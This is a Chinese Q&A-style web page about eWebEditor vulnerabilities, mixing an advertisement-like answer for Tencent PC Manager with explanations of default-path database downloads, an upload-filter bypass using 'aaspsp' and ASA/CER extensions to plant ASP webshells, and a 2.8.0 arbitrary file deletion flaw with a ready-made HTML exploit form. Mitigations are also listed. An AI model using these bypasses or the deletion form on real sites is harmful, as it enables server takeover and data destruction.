ewebeditor漏洞,ewebeditorls

http://www.itjxue.com  2023-01-22 13:55  来源:未知  点击次数: 

请教各位高人,如何解决jsp版ewebeditor的上传漏洞

建议腾讯电脑管家修复

1)腾讯电脑管家会智能匹配电脑系统,针对性推送适合系统的高危漏洞补丁,而其他安全软件可能推送非高危漏洞补丁;

2)腾讯电脑管家推送最近发布的漏洞补丁包,而其他安全软件可能提示已过期的漏洞补丁(可以通过查看各安全软件的补丁发布日期得知)。

3)腾讯电脑管家还可以定期自动删除补丁包,清理电脑空间

打开腾讯电脑管家——主菜单——修复漏洞——定期删除补丁包(默认勾选状态)

如何检查并堵住网站的eWebEditor漏洞

一、判断网站是否使用了eWebEditor的简单方法:查看程序源代码,看看源码中是否存在类似“ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。

二、该WEB编辑器可能被黑客利用攻击的安全漏洞:

(1)管理员未对编辑器的数据库路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

(2)管理员未对编辑器的用户登录路径进行修改,导致黑客可以利用网站数据库所获得的用户名和密码直接登陆编辑器管理后台。

(3)该WEB编辑器上传程序存在的安全漏洞:

请看Upload.asp文件,程序中有这么一段表达式:

sAllowExt = Replace(UCase(sAllowExt), "ASP", "")任何情况下都不允许上传asp脚本文件

但该语句仅过滤了ASP文件,未同时过滤ASA、CER等文件。上述两类文件同样可以构成ASP程序后门程序。黑客还能利用在上传程序类型中增加“aaspsp”来绕过此方法对扩展名的过滤,根据该语句的过滤规则,“aaspsp”过滤了“asp”字符后,反而变成了“asp”,这种类似的漏洞利用方法也可以运用在动网论坛7.0 sp2中。

总结

面对此种威胁网站管理员应该做好如下的防范措施:

1、使用了eWebEditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,防止数据库被黑客非法下载

2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止黑客进入后台管理界面

3、对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限

4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行。

ASP网站由ewebeditor编辑器漏洞引发的后果

他登陆编辑器后台后,可以修改允许上传的文件的类型,本来常理下,图片类型一般都是jpg、gif、png等,他可以修改这个设置,让编辑器可以上传asp文件

这样,他就可以上传一个asp木马文件,上传成功后,允许这个asp木马文件,那这样的话,不要说登陆网站后台,下载网站首页,就是把你所有文件都删除都行!

如果他这个木马文件功能够强大的话,控制整台服务器都有可能!

ewebeditor version 2.8.0这个版本的漏洞在哪

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:

' 把带"|"的字符串转为数组

Dim aSavePathFileName

aSavePathFileName = Split(sSavePathFileName, "|")

' 删除新闻相关的文件,从文件夹中

Dim i

For i = 0 To UBound(aSavePathFileName)

' 按路径文件名删除文件

Call DoDelFile(aSavePathFileName(i))

Next

而aSavePathFileName是前面从数据库取出来的:

sSavePathFileName = oRs("D_SavePathFileName")

看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:

sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))

...

oRs("D_SavePathFileName") = sSavePathFileName

居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:

Function GetSafeStr(str)

GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")

End Function

无 语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中 d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新 闻,于是主目录下的eWebEditor.asp不见了!

下面给出利用的htm:

HTMLHEADTITLEeWebEditor删除文件 /TITLE

stylebody,p,td,input {font-size:9pt}/style

/HEADBODYa href='list.asp'新闻列表/a | a href='add.asp'增加新闻/a

b增加新闻/b

form action=""

method="post" name="myform"

input type=hidden name=d_originalfilename

input type=hidden name=d_savefilename

table cellspacing=3 align=center

trtd要删的文件(相对路径就可以了):/td

tdinput type="text" name="d_savepathfilename" value="" size="90"/td

/tr

trtd新闻标题(随便填):/td

tdinput type="text" name="d_title" value="" size="90"/td

/tr

trtd标题图片:/td

tdselect name="d_picture" size=1option value=''无/option/select

当编辑区有插入图片时,将自动填充此下拉框/td

/tr

trtd新闻内容(随便填):/td

tdtextarea name="d_content"/textarea/td

/tr

/table

input type=submit name=btnSubmit value=" 提 交 "

input type=reset name=btnReset value=" 重 填 "

/form

/BODY/HTML

删除文件漏洞一般是配合其他漏洞使用的,比如目录遍历!

解决方法:删除测试文件目录,把默认的登录密码修改,或直接删除管理页面,因为,我们配置好,很少再改动的,最好把一些后台文件压缩后,删除。

(责任编辑:IT教学网)

更多

相关网络创业文章

推荐网络创业文章